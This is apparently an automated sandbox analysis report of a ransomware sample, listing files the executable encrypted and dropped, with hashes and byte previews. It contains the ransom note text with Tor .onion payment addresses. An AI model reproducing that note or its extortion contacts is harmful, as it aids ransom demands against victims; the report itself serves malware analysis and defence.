                                                                                                                                                      Preview: K.v.it..*...E...Wg...0..;,xBI.@p.!..Jz..].l.2...........:/.R.v?..,..x,...7...].....?.....Ou..}t.p...F..r...a.[...6je3.7......j${..j..p.e..a.....Q.(...Y.+lK.J.2.L....'7!..0........[..}.../...j.!...6.K...0!.6.....A..WVq../1...P.\...".PJ!..qE...~.-C...5..D../=9.z.....f*....uE*......A........`|...? .:.......s..C.......WX..`u........K,.n.2....'z.]....Gc.H..\l.;d.....s..9.>N.....y.<W....W.[..$-...1.....*...l..vZ&c..35...V.)..QLG..I0....Q.9.O.H.w.}F..!...e!l....g-_52p.......8+.\....k.+.n.....H]..R.b.l.e.....$..\..A.....K.TY....H.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9
                                                                                                                                                      C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\read-me.txt
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):11184
                                                                                                                                                      Entropy (8bit):7.112313590061694
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:PkLTvfM4J/Ko7oKprWLT9b92ra2zqb4VyWp11ti:PkvU4J/bzMLjSD29Qi
                                                                                                                                                      MD5:B84CCC3754FF0E934B75819722AA71C8
                                                                                                                                                      SHA1:D53FCC7825A9F6436DFCBCBEB52E1E560E2F518A
                                                                                                                                                      SHA-256:070656E64E1FB8A472A300E26F45E9AE622BA894140118D3FE5FFB77267A2EED
                                                                                                                                                      SHA-512:3975D860930AEFB7054DA965214CD43ADC462AC432DD5AD12A4FD9DD3819ACBBC8C1F045E92DE48325840AA5D16E1B15F9D25F28493EEE4076526486520A57B8
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: 2.3Pg.c...?.t..X.R.,..2A.L.x.....xM......Wb7....A........E..........j....I...Q)....`..CpM......{.b.^...{(h.v.PT..........y......X....b5......6...4c...eR+...o...........a(.@...s.k....|.....d&e.w.c&.g.c2.} x.....A.x.....1j. .4...2..e....?\v .O.O.&.EP..xwU...::.mXe2...h.'.....y.x..$...0N...T.K....p.y..r...6.z[1..Wk'.J.Va...u.l..*;.*.y.$@..2gD.[u%..#W.>c.u.........4...n.........j.^0;Ci;..zm&..l.O.....!....y\I.U?V$A6..]~F..{..k?.^..}......z...z.UJ..i0g.Sb.I...a<R...;..3,.="}...&.(..k~"..>.9Y)Dt-..;..$#n.....kp......V...c..:.h.......5...0^.{6."..|....o....\./..#..>.A.Ze.....k....:...D3x.tF..tZ...&....g.p.}7.../.6...=..,.O.Dx.V...&...2.Q.W...#.y...j..Q.c}....1...@PG.M..Zu|..SD.. ..~.....R.F.yCd.....t...|!Mvh."..`....=. 5.....L'.\&.a.._...%.b.....'...W....z>..w....c.?.<....x.j...'>..... ...^....A.f...(.(......G..6.1...8...D.........B[7.5QF.x..`.K=[........b(YX.3.....,.I..:j.M-..|..r.[.=.M...."(.}.%.z..T......u...T.4,..f#h.r...7.c.S..0W
                                                                                                                                                      C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):11184
                                                                                                                                                      Entropy (8bit):7.112313590061694
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:PkLTvfM4J/Ko7oKprWLT9b92ra2zqb4VyWp11ti:PkvU4J/bzMLjSD29Qi
                                                                                                                                                      MD5:B84CCC3754FF0E934B75819722AA71C8
                                                                                                                                                      SHA1:D53FCC7825A9F6436DFCBCBEB52E1E560E2F518A
                                                                                                                                                      SHA-256:070656E64E1FB8A472A300E26F45E9AE622BA894140118D3FE5FFB77267A2EED
                                                                                                                                                      SHA-512:3975D860930AEFB7054DA965214CD43ADC462AC432DD5AD12A4FD9DD3819ACBBC8C1F045E92DE48325840AA5D16E1B15F9D25F28493EEE4076526486520A57B8
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: 2.3Pg.c...?.t..X.R.,..2A.L.x.....xM......Wb7....A........E..........j....I...Q)....`..CpM......{.b.^...{(h.v.PT..........y......X....b5......6...4c...eR+...o...........a(.@...s.k....|.....d&e.w.c&.g.c2.} x.....A.x.....1j. .4...2..e....?\v .O.O.&.EP..xwU...::.mXe2...h.'.....y.x..$...0N...T.K....p.y..r...6.z[1..Wk'.J.Va...u.l..*;.*.y.$@..2gD.[u%..#W.>c.u.........4...n.........j.^0;Ci;..zm&..l.O.....!....y\I.U?V$A6..]~F..{..k?.^..}......z...z.UJ..i0g.Sb.I...a<R...;..3,.="}...&.(..k~"..>.9Y)Dt-..;..$#n.....kp......V...c..:.h.......5...0^.{6."..|....o....\./..#..>.A.Ze.....k....:...D3x.tF..tZ...&....g.p.}7.../.6...=..,.O.Dx.V...&...2.Q.W...#.y...j..Q.c}....1...@PG.M..Zu|..SD.. ..~.....R.F.yCd.....t...|!Mvh."..`....=. 5.....L'.\&.a.._...%.b.....'...W....z>..w....c.?.<....x.j...'>..... ...^....A.f...(.(......G..6.1...8...D.........B[7.5QF.x..`.K=[........b(YX.3.....,.I..:j.M-..|..r.[.=.M...."(.}.%.z..T......u...T.4,..f#h.r...7.c.S..0W
                                                                                                                                                      C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):25104
                                                                                                                                                      Entropy (8bit):6.432229123973561
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:qdJdclow375nPDZyRGhQATCIydAIQ+Rh4BhcwhUzNk:aclH3Z9yKhRydNQ+0ewuzi
                                                                                                                                                      MD5:12A2D301E76F870E2A5CFBA6923CB3AD
                                                                                                                                                      SHA1:B151B03136F5C869A027C59484BDED3C27766BF6
                                                                                                                                                      SHA-256:CE05081F2ACA3B3B8D80857E176BB37A006897244FC3F79E623581F095962C35
                                                                                                                                                      SHA-512:F04E2AD99582AA7BB1596F8D286A877823D5D546F2539C7F7D1D2D18393B4B8E9705F0CFA8EA29DDD644AD8710197CF10190C82FA8C96D02DB045A29F2C6DC61
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .6...> .....-.t.8....o.x*S.)9....Tb../...=.y.....|.uU&.nzz...|o....I....>.K^=.@.C.4....&.]Q.rfW...N..J>..8..%..U..HyT.t.......C...F..FP9c.F.7t..-{.`!..;..p.F..w..(.I.....FP.....2.[|.^_PVW...Wi.Z.....&Q...G.........7..;<..H1.|.H..M.Y.%.L.~..f...MQ.......(M]..}1..c .....`......k..9./H|FJ...V..........b..JL.y..........$...mClbcM.......f.Q.n...N!......NI.....#F.....h....$H...z...T...*...|LA8.bE.[...I..V_.>.&..C...Y..7P.p.2o.@\..qG.rS|...<.)....0J...W)y.)-&+..I..%..U.Z......q3.1g.K......,.5.."@.^.....}4..oQ....Nt..z.I.R.ep.G...M&.V.~.Y.Y.......e.Db:<a..-....3..g..?..r....l..ZH..6KMIA..x;..,./{%.....?Z{...zl. .v.......-.n..C.....nb5&...:of.Q.Z......!@/.....t./v,8.ix...c.... ..n.9..Um.A.....d.<R.n.UU..Yhb.G....}6. @V.tTM&.X..qj........n.B.w.o..\..H..Zia.mk.v=.V........GW.b0.......S..>.<....n..9E.e..t.I....\e.y.jzo....b.4.II..G....E....\.T.,.Z.a...!].......AD.#.....d.8....+.......k.....)..q..../..ny5W..G...o.....2.....GX.v.._.(.>..H...^+.m..|..-..g.
                                                                                                                                                      C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):25104
                                                                                                                                                      Entropy (8bit):6.432229123973561
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:qdJdclow375nPDZyRGhQATCIydAIQ+Rh4BhcwhUzNk:aclH3Z9yKhRydNQ+0ewuzi
                                                                                                                                                      MD5:12A2D301E76F870E2A5CFBA6923CB3AD
                                                                                                                                                      SHA1:B151B03136F5C869A027C59484BDED3C27766BF6
                                                                                                                                                      SHA-256:CE05081F2ACA3B3B8D80857E176BB37A006897244FC3F79E623581F095962C35
                                                                                                                                                      SHA-512:F04E2AD99582AA7BB1596F8D286A877823D5D546F2539C7F7D1D2D18393B4B8E9705F0CFA8EA29DDD644AD8710197CF10190C82FA8C96D02DB045A29F2C6DC61
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .6...> .....-.t.8....o.x*S.)9....Tb../...=.y.....|.uU&.nzz...|o....I....>.K^=.@.C.4....&.]Q.rfW...N..J>..8..%..U..HyT.t.......C...F..FP9c.F.7t..-{.`!..;..p.F..w..(.I.....FP.....2.[|.^_PVW...Wi.Z.....&Q...G.........7..;<..H1.|.H..M.Y.%.L.~..f...MQ.......(M]..}1..c .....`......k..9./H|FJ...V..........b..JL.y..........$...mClbcM.......f.Q.n...N!......NI.....#F.....h....$H...z...T...*...|LA8.bE.[...I..V_.>.&..C...Y..7P.p.2o.@\..qG.rS|...<.)....0J...W)y.)-&+..I..%..U.Z......q3.1g.K......,.5.."@.^.....}4..oQ....Nt..z.I.R.ep.G...M&.V.~.Y.Y.......e.Db:<a..-....3..g..?..r....l..ZH..6KMIA..x;..,./{%.....?Z{...zl. .v.......-.n..C.....nb5&...:of.Q.Z......!@/.....t./v,8.ix...c.... ..n.9..Um.A.....d.<R.n.UU..Yhb.G....}6. @V.tTM&.X..qj........n.B.w.o..\..H..Zia.mk.v=.V........GW.b0.......S..>.<....n..9E.e..t.I....\e.y.jzo....b.4.II..G....E....\.T.,.Z.a...!].......AD.#.....d.8....+.......k.....)..q..../..ny5W..G...o.....2.....GX.v.._.(.>..H...^+.m..|..-..g.
                                                                                                                                                      C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storek
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1216
                                                                                                                                                      Entropy (8bit):5.905933631908583
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:pxaHkCWtt9UfG2BzK8sevWAVgKTaCB7RZ0cHYIgtyUzRmULeZ:eHOyBzCwgck38uaZ
                                                                                                                                                      MD5:6D0CEEBB20445E90DEEA67A9112171BF
                                                                                                                                                      SHA1:34A558734D7C9E17C316BA7963CBE9F2D0E6354F
                                                                                                                                                      SHA-256:501EF05A7FF0F3D86D834DE8EE4FDD335762A43CB1AD42AF79EF18C0C86B288E
                                                                                                                                                      SHA-512:3E80CFEB7BA852B4608329609E77F578F8559093663C0702A6B36C4A75AE49FAA79B8152E73B2E7B3B184280E0D133F33B7CD7B73088F977655CF5803AF35938
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .#.4....}L....*wZ.!...zZ...}$.f.z.1..N.p...O..)._.XA...r.G.L......H..M..l...x.!y...0{.b.{.c..)^.#. .i..=K.p.]Q.{_...)..k...%; A........-.2z6f......X.P../)G.g$.....I..o.~...:pWT..kg....b......1.-w...c.4.Xz....1I.k...Q....4.D.l.d...Gx..r<..in.s..[.e$.*G.V.L.N...{.)7H....W ..{...j..x....Y..2.9.}.'!~8A..o..t@....".,.b4cF.G.S...L.....f..^O..TH/.G<...hv.a....<....$...<...........7S.u.lL.n.3.%67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4
                                                                                                                                                      C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storek.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1216
                                                                                                                                                      Entropy (8bit):5.905933631908583
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:pxaHkCWtt9UfG2BzK8sevWAVgKTaCB7RZ0cHYIgtyUzRmULeZ:eHOyBzCwgck38uaZ
                                                                                                                                                      MD5:6D0CEEBB20445E90DEEA67A9112171BF
                                                                                                                                                      SHA1:34A558734D7C9E17C316BA7963CBE9F2D0E6354F
                                                                                                                                                      SHA-256:501EF05A7FF0F3D86D834DE8EE4FDD335762A43CB1AD42AF79EF18C0C86B288E
                                                                                                                                                      SHA-512:3E80CFEB7BA852B4608329609E77F578F8559093663C0702A6B36C4A75AE49FAA79B8152E73B2E7B3B184280E0D133F33B7CD7B73088F977655CF5803AF35938
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .#.4....}L....*wZ.!...zZ...}$.f.z.1..N.p...O..)._.XA...r.G.L......H..M..l...x.!y...0{.b.{.c..)^.#. .i..=K.p.]Q.{_...)..k...%; A........-.2z6f......X.P../)G.g$.....I..o.~...:pWT..kg....b......1.-w...c.4.Xz....1I.k...Q....4.D.l.d...Gx..r<..in.s..[.e$.*G.V.L.N...{.)7H....W ..{...j..x....Y..2.9.}.'!~8A..o..t@....".,.b4cF.G.S...L.....f..^O..TH/.G<...hv.a....<....$...<...........7S.u.lL.n.3.%67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4
                                                                                                                                                      C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):15400
                                                                                                                                                      Entropy (8bit):7.045244866041693
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:/KlFXJKOAJvl1uUGMthe6kKbs/eeHaTG1aI/KDhMVsuNeMcGdSD9obOUAVlcMudu:Svd4G1etbJuaiuhHOelGdWaolvsTc9
                                                                                                                                                      MD5:290C9B2CB21BC0C67DF9B1CB643FA212
                                                                                                                                                      SHA1:490299631AD21C2F922AF1436814183155873ADC
                                                                                                                                                      SHA-256:8F5B3FD704E011B87E90B0138BFDE6FFBA429EF4DB325444C5DC731DBBF8FDE3
                                                                                                                                                      SHA-512:885EFC925540FA2FB3DF05C66BE9FED3D816E549B8052106D7B6DA944A31B81687D373BE23E7438C73E6CC09F835A150EEE1D516B5CEF0720C3623CBE359F308
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .{.!J..R..e..B....w.}f..wP.=..G..8.p.O...+-F..I..T9'.j.f.."[....U\.=.Sz.....6.-"=..S.....<....)....nc.+..J.E.N.\..W..<a........^?...._m..1..O....{.A.!%.^..........sf..[...(...X [g.{....f..H.y..`...mZ...G@(_.......6.&'.\>".[2..bt........f^F{..z.._c...]@..F^._..YL...a7....;.a...)$.D..&W.Dh..TN.....6......U%.[.c...$.d..9`_8:.[.0.~.K[.........-_}.\J.>6.k9T3@....|nl.}%.0(...U.w..$...'+?z...........)ZoQ.5..._t.@.H..O..y7.0..`.w.?.x..oe.!....UY...q.s...g.1.u.1..............+...x...b....jF!...,.P...0..8|^zmV.>......%.!...|8...^...N..K.....P.-...E,.\6.J..g..,.!4....nL,. 4..._.q.|>p..|.....OO......B?GCt].0.Z.{mu..!T....h........+.. ..!k?..*....S.?)...2Z.vYlQq..,N=Nl.v.g.v0.=..:...k.,o.,.o.A..X..FrxaFIV.B......winM..S....|...v.........1.J./`.,..8X...g....3q.G..d+...',8O..1.Vih=.f.kwJ..?O...F.A,$P.M.K..2t.......3.O.&o.U....`i....O...Z..2..'..h.e....4..u.....K...w..6.....O.......t..o$D.^...p..|..@.fC.H..1|]|G..#.v=..F..8...@.. .<;..y.z.\....l..W*.\....M9..Tg.6.
                                                                                                                                                      C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):15400
                                                                                                                                                      Entropy (8bit):7.045244866041693
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:/KlFXJKOAJvl1uUGMthe6kKbs/eeHaTG1aI/KDhMVsuNeMcGdSD9obOUAVlcMudu:Svd4G1etbJuaiuhHOelGdWaolvsTc9
                                                                                                                                                      MD5:290C9B2CB21BC0C67DF9B1CB643FA212
                                                                                                                                                      SHA1:490299631AD21C2F922AF1436814183155873ADC
                                                                                                                                                      SHA-256:8F5B3FD704E011B87E90B0138BFDE6FFBA429EF4DB325444C5DC731DBBF8FDE3
                                                                                                                                                      SHA-512:885EFC925540FA2FB3DF05C66BE9FED3D816E549B8052106D7B6DA944A31B81687D373BE23E7438C73E6CC09F835A150EEE1D516B5CEF0720C3623CBE359F308
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .{.!J..R..e..B....w.}f..wP.=..G..8.p.O...+-F..I..T9'.j.f.."[....U\.=.Sz.....6.-"=..S.....<....)....nc.+..J.E.N.\..W..<a........^?...._m..1..O....{.A.!%.^..........sf..[...(...X [g.{....f..H.y..`...mZ...G@(_.......6.&'.\>".[2..bt........f^F{..z.._c...]@..F^._..YL...a7....;.a...)$.D..&W.Dh..TN.....6......U%.[.c...$.d..9`_8:.[.0.~.K[.........-_}.\J.>6.k9T3@....|nl.}%.0(...U.w..$...'+?z...........)ZoQ.5..._t.@.H..O..y7.0..`.w.?.x..oe.!....UY...q.s...g.1.u.1..............+...x...b....jF!...,.P...0..8|^zmV.>......%.!...|8...^...N..K.....P.-...E,.\6.J..g..,.!4....nL,. 4..._.q.|>p..|.....OO......B?GCt].0.Z.{mu..!T....h........+.. ..!k?..*....S.?)...2Z.vYlQq..,N=Nl.v.g.v0.=..:...k.,o.,.o.A..X..FrxaFIV.B......winM..S....|...v.........1.J./`.,..8X...g....3q.G..d+...',8O..1.Vih=.f.kwJ..?O...F.A,$P.M.K..2t.......3.O.&o.U....`i....O...Z..2..'..h.e....4..u.....K...w..6.....O.......t..o$D.^...p..|..@.fC.H..1|]|G..#.v=..F..8...@.. .<;..y.z.\....l..W*.\....M9..Tg.6.
                                                                                                                                                      C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\read-me.txt
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\desktop.ini.xls.LNK
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, System, Archive, ctime=Thu Jun 27 16:19:52 2019, mtime=Thu Jan 6 20:03:57 2022, atime=Thu Jan 6 20:03:43 2022, length=1120, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1622
                                                                                                                                                      Entropy (8bit):4.680706443512511
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:8LIO1/0pkVeCZ/qMv7P7wusu2CyjMybAmB6:8LztdgCoMv7dGC0MybAm
                                                                                                                                                      MD5:79B27FC3A051FFEAC32B9619870AA9E3
                                                                                                                                                      SHA1:DFDF7466525CBDF16A8DBC7EC4D9FC3E640201CA
                                                                                                                                                      SHA-256:DEEBD534ECFEC5613149DA52382AB54D31DDFC90B2D51C4AA20107AD596137BC
                                                                                                                                                      SHA-512:954A73649E8DD3098B0A4DE6C34C7CC8B8CD89E5C69FAF0F929A994849C8F855F3D8493EC5BFDDE7EC69AB643D3BEE6972ED25B62657B2E555219EE05BE346C3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: L..................F....&...`...-..v...@...W.).@...`............................P.O. .:i.....+00.../C:\...................P.1.....&Tn...Users.<......L..&Tn...............................U.s.e.r.s.....P.1.....&Tq...user.<.......Ny.&Tq......S........................h.a.r.d.z.....V.1......Nz...AppData.@.......Ny.&T\......Y....................f.(.A.p.p.D.a.t.a.....V.1.....&Tk...Roaming.@.......Ny.&Tk......Y....................z...R.o.a.m.i.n.g.....\.1.....>QCw..MICROS~1..D.......Ny.&T\......Y........................M.i.c.r.o.s.o.f.t.....V.1.....7Swy..Windows.@.......Ny.&T\......Y.....................f..W.i.n.d.o.w.s.....^.1.....&Tr...STARTM~1..F.......Ny.&Tr......Y.....................+..S.t.a.r.t. .M.e.n.u.....Z.1.....&Tr...Programs..B.......Ny.&Ts......Y.....................~9.P.r.o.g.r.a.m.s.....V.1.....&Tv...Startup.@.......N{.&Tw..........................Q.f.S.t.a.r.t.u.p.....l.2.`...&Tv.&.DESKTO~1.XLS..P.......N{.&Tv............................h..d.e.s.k.t.o.p...i.n.i..
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):81
                                                                                                                                                      Entropy (8bit):4.496758572906991
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:bDuMJlZzfLKKde2mMpO0LKKde2v:bCSrLKEpO0LKc
                                                                                                                                                      MD5:CFE29F2F1C842C3FEA9DFDDC1DA05456
                                                                                                                                                      SHA1:79BB63D64BE041CCB215339824A16F573538B186
                                                                                                                                                      SHA-256:38EBA3E2579252069B26CB25B4029E57C49895EB556117AF7549B625143CBF08
                                                                                                                                                      SHA-512:E80DE0E24DEC5189289C8C510B390EB1860C42E87F178C423690E7FDC20A1C61342D9AB772389A21E8EF132022195A466A9358A2CC6536FD996CF3E032ADD1A9
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: [folders]..Templates.LNK=0..desktop.ini.xls.LNK=0..[xls]..desktop.ini.xls.LNK=0..
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2000
                                                                                                                                                      Entropy (8bit):7.010498724898928
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:2Q7myrZrtzJNTMbuDTZTWPs+zCwgck38G:2Q79HJ5M6TZTD+zTEJ
                                                                                                                                                      MD5:9322F4C74E81410D40743859931EA0B5
                                                                                                                                                      SHA1:743865FE9F1E60C5E1F47205C08729C49EC2F9A3
                                                                                                                                                      SHA-256:70A320E4752DB21B4ABB4B7BF246EC21D4AAB7CFEE0BD4A3E7DA209D0CE0F4E1
